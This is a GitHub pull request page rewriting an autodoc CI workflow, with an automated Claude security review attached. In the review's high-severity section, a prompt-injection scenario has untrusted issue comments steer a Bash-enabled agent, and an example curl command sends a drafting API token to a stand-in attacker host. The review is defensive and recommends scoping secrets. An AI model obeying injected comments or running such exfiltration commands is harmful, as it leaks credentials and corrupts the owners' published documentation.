Skip to content

autodoc: rewrite workflow to be self-contained (no uv)#495

Merged
jdcmsd merged 3 commits into
mainfrom
autodoc-consolidate-and-rename
Jun 24, 2026
Merged

autodoc: rewrite workflow to be self-contained (no uv)#495
jdcmsd merged 3 commits into
mainfrom
autodoc-consolidate-and-rename

Conversation

@jdcmsd

@jdcmsd jdcmsd commented Jun 24, 2026

Copy link
Copy Markdown
Member

Rewrites the issue_autodoc.yml workflow to eliminate the uv / Python-script dependency, making it self-contained.

What changed:

  • Removed: Set up uv, Install autodoc dependencies, uv run python finalize.py steps
  • Build eval context: Python3 stdlib + gh CLI in a heredoc (no pip, no venv)
  • Run Claude: unchanged — claude --print --allowedTools Bash,Write < /tmp/eval_context.md
  • Finalize: pure shell + inline Python3 heredocs for JSON payloads; gh issue comment for posting; curl for dotCMS EDIT/NEW; git push for committing
  • Fixed jq null-parent bug in preflight guard
  • Reads prompts/burlap.txt directly (no YAML parsing)

This mirrors the change in dotCMS/core PR dotCMS#36294 and resolves the ordering dependency on the dotcms-aios PR.

@jdcmsd jdcmsd requested a review from a team as a code owner June 24, 2026 10:46
@jdcmsd jdcmsd force-pushed the autodoc-consolidate-and-rename branch from abccc4a to 26b0c94 Compare June 24, 2026 11:53
@claude

claude Bot commented Jun 24, 2026

Copy link
Copy Markdown

Claude finished @jdcmsd's task in 1m 58s —— View job


Review: autodoc self-contained rewrite

  • Read full workflow file
  • Analyze eval-context build step
  • Analyze finalize step
  • Check security (secrets, injection, validation)
  • Post review

The rewrite is well-structured and the slug/UUID validation guards are a genuine improvement. A few things worth a second look, ordered by severity.


🔴 High — Prompt injection into a Bash-enabled agent holding write secrets

Build eval context assembles /tmp/eval_context.md from fully untrusted input: the epic body, epic comments, and the body + comments of every related PR (.github/workflows/issue_autodoc.yml:115-167). Comments and PRs can come from arbitrary external contributors. That file is then piped straight into:

claude --print --allowedTools Bash,Write < /tmp/eval_context.md   # line 195

The autodoc job sets these at job level (lines 69-78), so the Run Claude step inherits all of them in its environment:

  • ANTHROPIC_API_KEY
  • AUTODOC_DOTCMS_API_TOKEN_AISEARCH
  • AUTODOC_DOTCMS_API_TOKEN_DRAFTING (write-capable — used by finalize to fire EDIT/NEW)
  • AUTODOC_DOTCMS_BASE_URL, AUTODOC_DOTCMS_SITE_FOLDER

Since Claude has Bash and network access (it's expected to curl per the comment on line 74), a crafted issue/PR comment can instruct the model to exfiltrate those tokens (curl evil.com -d "$AUTODOC_DOTCMS_API_TOKEN_DRAFTING") or directly write/poison dotCMS documentation content. The 4000-char comment filter (line 121) does not mitigate this — an injection payload is short.

This is the core risk of the design, not a regression, but the rewrite keeps it. Worth considering:

  • Drop Bash from --allowedTools if the prompt doesn't strictly need it, or run the step network-restricted.
  • Treat the report content as untrusted before it's pushed to live docs in finalize.

🔴 High — Secret over-provisioning to the Claude step

Even setting injection aside, the Run Claude step only needs ANTHROPIC_API_KEY (+ the read AISEARCH token if the prompt curls). The write AUTODOC_DOTCMS_API_TOKEN_DRAFTING is only used by the finalize step's EDIT/NEW calls, yet job-level env exposes it to every step. Scope secrets per-step (env: on the individual step) so the agent never sees the write token:

  • Run ClaudeANTHROPIC_API_KEY, AUTODOC_DOTCMS_API_TOKEN_AISEARCH
  • Post comment…AUTODOC_DOTCMS_API_TOKEN_DRAFTING, GH_TOKEN, base URL, site folder

🟠 Medium — Report is committed last, after the fragile network calls

The durable record (git commit of the report, lines 292-298) runs after the dotCMS curl calls. GitHub Actions runs steps with set -eo pipefail, and --fail-with-body makes a non-2xx dotCMS response fail the step. So a transient dotCMS error means: comment already posted, but the generated report is never committed to dotcms-aios and is lost with the runner. Consider committing the report before applying to dotCMS, so the expensive Claude output is always persisted.

🟠 Medium — action parsed differently from every other meta field

ACTION=$(awk '... p && /^action:/{print $2; exit}' "$REPORT")   # line 222

The PR description says "All fields use sub() to preserve the full value," but action uses print $2. That breaks on action:update (no space → empty) or action: update now (trailing junk ignored, may mask a malformed report). Use the same sub(/^action:[[:space:]]*/,"") pattern for consistency and robustness.

🟠 Medium — No concurrency group

If an epic is closed → reopened → closed in quick succession (or two qualifying issues close near-simultaneously and target the same report path / comment), two autodoc jobs race on the comment PATCH and the git push origin HEAD (line 297). The push can fail non-fast-forward. Add a concurrency: group keyed on the epic number to serialize.

🟡 Low / nits

  • Slug regex ^[a-z0-9][a-z0-9-]*[a-z0-9]$ (line 227) requires ≥2 chars — a legitimate single-char urlTitle is rejected. Use ^[a-z0-9]([a-z0-9-]*[a-z0-9])?$ if single chars are valid.
  • Redundant check grep -qE '<uuid>' && [ -n "$IDENTIFIER" ] (line 240) — an empty string can't match the UUID regex, so -n is dead.
  • Unpinned npm install -g @anthropic-ai/claude-code (line 94) — acknowledged in the comment; flagging only for supply-chain awareness.
  • Python nitsopen(vault_file).read() (line 175) and other open()s leak handles and use no explicit encoding. Trivial for a short-lived script.

Note: I can't modify files under .github/workflows/ (GitHub App permission limitation), so this is review-only — no changes pushed.

- Fix -f → -F on gh api PATCH so the file is read, not sent literally
- Prepend <!-- autodoc-report --> marker in finalize before posting so
  idempotent edit lookup works (marker was not in the report itself)
- Add --paginate to comment lookup to search beyond the first page
- Use jq first // empty instead of | head -1 to avoid SIGPIPE
- Fix urlTitle awk to use sub() consistent with title/tags/seoDescription
- Remove -k (TLS bypass); add --fail-with-body to dotCMS curl calls
- Add comment clarifying AUTODOC_DOTCMS_API_TOKEN_AISEARCH is used by
  the Claude subprocess via burlap.txt, not directly by a workflow step
- Make git push conditional on commit succeeding (|| true was causing
  unconditional push even when there was nothing new to commit)
- Add git push origin HEAD for explicit branch targeting
- Validate urlTitle is a URL slug before interpolating into JSON query
  (non-slug chars would break the shell-built -d payload)
- Validate IDENTIFIER matches UUID format before placing in URL
- Add comment on unpinned npm install explaining the tradeoff
@jdcmsd jdcmsd merged commit f6d81d9 into main Jun 24, 2026
20 of 21 checks passed
@jdcmsd jdcmsd deleted the autodoc-consolidate-and-rename branch June 24, 2026 16:34
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant